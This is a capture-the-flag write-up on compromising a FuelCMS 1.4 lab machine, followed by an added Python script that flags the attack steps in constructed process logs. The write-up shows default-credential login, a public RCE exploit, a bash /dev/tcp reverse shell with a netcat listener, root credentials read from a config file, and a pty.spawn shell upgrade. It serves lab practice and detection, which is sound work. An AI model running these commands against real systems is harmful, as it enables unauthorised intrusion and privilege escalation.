Write-Up
Step-by-step guide on the approach taken to pwn the machine.
Objectives
In this machine, we are tasked with finding two specific items: user.txt and root.txt.
Reconnaissance
We start by running an nmap scan on the 100 most common ports to identify open services:
nmap -F --open <ip_victim>
The -F flag scans the top 100 common ports, and --open shows only open ports.
The scan reveals that port 80 is open. We visit the web page at:
http://<ip_victim>
We find a landing page for FuelCMS, version 1.4. Reading the configuration steps, we notice a link to the admin panel.
Upon closer inspection of the landing page, we find default admin credentials listed: admin/admin. We attempt to log in to the admin panel using these credentials and successfully gain access.
Exploitation
Once inside, the CMS seems recently installed and quite empty. Given the CMS version, we check exploit-db.com for potential vulnerabilities.
We discover three Remote Code Execution (RCE) exploits. We opt for the third one, written in Python3, as it is current and well-documented.
We copy the exploit to a file named fuel.py and run it:
python3 fuel.py -u <url_victim>
This provides a web shell running as www-data. Checking the directories, we locate user.txt and read its contents.
Privilege Escalation
The web shell does not allow us to input passwords for sudo commands, limiting our ability to escalate privileges. To overcome this, we establish a reverse shell.
We start a listener on our local machine:
nc -lnvp 4444
Then, on the victim machine, we run:
bash -c "bash -i >& /dev/tcp/<our_ip>/4444 0>&1"
To find our IP, we run ifconfig and use the IP listed under tun0.
With the reverse shell active, we check the FuelCMS landing page again. The database configuration file mentioned in step 2 of its configuration steps catches our attention.
We inspect it:
cat /path/to/config/database.php
At the bottom, we find the root credentials:
username: root
password: mememe
However, trying to switch to root fails with a terminal error, because our reverse shell is not attached to a TTY. We need a better shell, so we spawn a pseudo-terminal for full interaction:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now we try switching to root again, and it works. We locate root.txt and read its contents.
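As an added example (not part of the original write-up), here is the detection side of the chain above: a small Python rule set run over constructed process-execution events that flags a web-server account spawning a shell, the /dev/tcp reverse shell, the pty.spawn TTY upgrade, and the su attempt from www-data. The event format, process names and IP address are constructed assumptions, not data from the machine.

```python
import json
from dataclasses import dataclass

# Constructed process-execution events (not from the original write-up), in the
# shape a process-auditing sensor might emit: one JSON object per line.
SAMPLE_EVENTS = """\
{"ts":"2024-01-01T10:00:01Z","user":"www-data","parent":"apache2","cmd":"sh -c ls /var/www"}
{"ts":"2024-01-01T10:00:05Z","user":"www-data","parent":"apache2","cmd":"bash -c \\"bash -i >& /dev/tcp/10.10.14.5/4444 0>&1\\""}
{"ts":"2024-01-01T10:00:09Z","user":"www-data","parent":"bash","cmd":"python3 -c 'import pty; pty.spawn(\\"/bin/bash\\")'"}
{"ts":"2024-01-01T10:00:12Z","user":"www-data","parent":"bash","cmd":"su root"}
{"ts":"2024-01-01T10:05:00Z","user":"alice","parent":"sshd","cmd":"bash -c \\"ls -la\\""}
"""

WEB_USERS = {"www-data", "apache", "nginx"}            # accounts a web app runs as
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}  # web server processes
SHELLS = {"sh", "bash", "dash", "zsh"}

# (name, severity, predicate) -- each predicate inspects one parsed event
RULES = [
    ("web-server-spawned-shell", "low",
     lambda e: e["user"] in WEB_USERS and e["parent"] in WEB_PARENTS
               and e["cmd"].split()[0] in SHELLS),
    ("reverse-shell-dev-tcp", "high",
     lambda e: "/dev/tcp/" in e["cmd"]),
    ("tty-upgrade-pty-spawn", "medium",
     lambda e: "pty.spawn" in e["cmd"]),
    ("privilege-change-from-web-user", "high",
     lambda e: e["user"] in WEB_USERS and e["cmd"].split()[0] in {"su", "sudo"}),
]

@dataclass
class Finding:
    ts: str
    rule: str
    severity: str
    cmd: str

def analyze(log_text: str) -> list[Finding]:
    """Run every rule over every event; one Finding per (event, matched rule)."""
    findings = []
    for line in filter(None, log_text.splitlines()):
        event = json.loads(line)
        for name, severity, pred in RULES:
            if pred(event):
                findings.append(Finding(event["ts"], name, severity, event["cmd"]))
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.ts} [{f.severity}] {f.rule}: {f.cmd}")
```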